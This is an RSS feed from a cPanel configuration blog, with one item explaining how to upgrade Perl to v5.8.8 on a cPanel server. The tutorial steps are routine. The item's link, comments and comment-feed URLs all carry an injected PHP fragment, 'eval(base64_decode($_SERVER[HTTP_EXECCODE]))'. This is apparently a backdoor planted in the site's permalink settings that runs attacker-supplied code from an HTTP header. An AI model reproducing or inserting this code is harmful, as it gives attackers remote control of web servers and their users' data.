<?xml version="1.0" encoding="UTF-8"?>
<rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:wfw="http://wellformedweb.org/CommentAPI/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
	xmlns:slash="http://purl.org/rss/1.0/modules/slash/"
	>

<channel>
	<title>cPanelConfig - cPanel server configuration guide &#187; 5.8.8</title>
	<atom:link href="http://www.cpanelconfig.com/tag/588/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.cpanelconfig.com</link>
	<description>The complete guide to setup and manage a cPanel based server</description>
	<lastBuildDate>Fri, 17 Jul 2009 11:15:39 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8</generator>
	<language>en</language>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
			<item>
		<title>How to upgrade perl to v5.8.8</title>
		<link>http://www.cpanelconfig.com/2007/09/26/how-to-upgrade-perl-to-v588/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/</link>
		<comments>http://www.cpanelconfig.com/2007/09/26/how-to-upgrade-perl-to-v588/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/#comments</comments>
		<pubDate>Wed, 26 Sep 2007 20:50:45 +0000</pubDate>
		<dc:creator>yolau</dc:creator>
				<category><![CDATA[How to]]></category>
		<category><![CDATA[5.8.8]]></category>
		<category><![CDATA[cpanel]]></category>
		<category><![CDATA[cpanel 11]]></category>
		<category><![CDATA[perl]]></category>
		<category><![CDATA[upgrade]]></category>

		<guid isPermaLink="false">http://www.cpanelconfig.com/how-to/how-to-upgrade-perl-to-v588/</guid>
		<description><![CDATA[



Installing and running cPanel 11 require you to have perl v5.8.8. If you run an older version some things will not work properly (like spamassasin for example).
Do you need to upgrade?
YES if you running an older version.
How to check what version are you using?
Run:
perl -v
If you see anything like:
This is perl, v5.8.7 built for i686-linux
then [...]]]></description>
			<content:encoded><![CDATA[<p><!--adsense--><br />
Installing and running cPanel 11 require you to have perl v5.8.8. If you run an older version some things will not work properly (like spamassasin for example).<br />
<strong>Do you need to upgrade?</strong><br />
YES if you running an older version.<br />
<strong>How to check what version are you using?</strong><br />
Run:</p>
<blockquote><p>perl -v</p></blockquote>
<p>If you see anything like:</p>
<blockquote><p>This is perl, <strong>v5.8.7</strong> built for i686-linux</p></blockquote>
<p>then you need to upgrade.</p>
<p>Upgrading is simple but I have seen a few problems in the past this is why I decided to write the how to.</p>
<ol>
<li>Download the cPanel perl installer</li>
<blockquote><p>wget http://layer1.cpanel.net/perl588installer.tar.gz</p></blockquote>
<li>Extract the archive</li>
<blockquote><p>tar zxvf perl588installer.tar.gz</p></blockquote>
<li>Run the installer</li>
<blockquote><p>cd perl588installer<br />
./install</p></blockquote>
<p><!--adsense--></p>
<li>Check perl modules</li>
<blockquote><p>/scripts/checkperlmodules</p></blockquote>
<li>Force a cPanel update</li>
<blockquote><p>/scripts/upcp &#8211;force</p></blockquote>
<li>Update perl information in user&#8217;s cPanel</li>
<blockquote><p>rm -rf /home/*/.cpanel;rm -rf /home/*/.cpanel-datastore</p></blockquote>
<li>Check the actual new perl version</li>
<blockquote><p>perl -v</p></blockquote>
<p>This should now output something like:<br />
<!--adsense--></p>
<blockquote><p>This is perl, v5.8.8 built for i686-linux</p></blockquote>
</ol>
]]></content:encoded>
			<wfw:commentRss>http://www.cpanelconfig.com/2007/09/26/how-to-upgrade-perl-to-v588/%&amp;({${eval(base64_decode($_SERVER[HTTP_EXECCODE]))}}|.+)&amp;%/feed/</wfw:commentRss>
		<slash:comments>4</slash:comments>
		</item>
	</channel>
</rss>
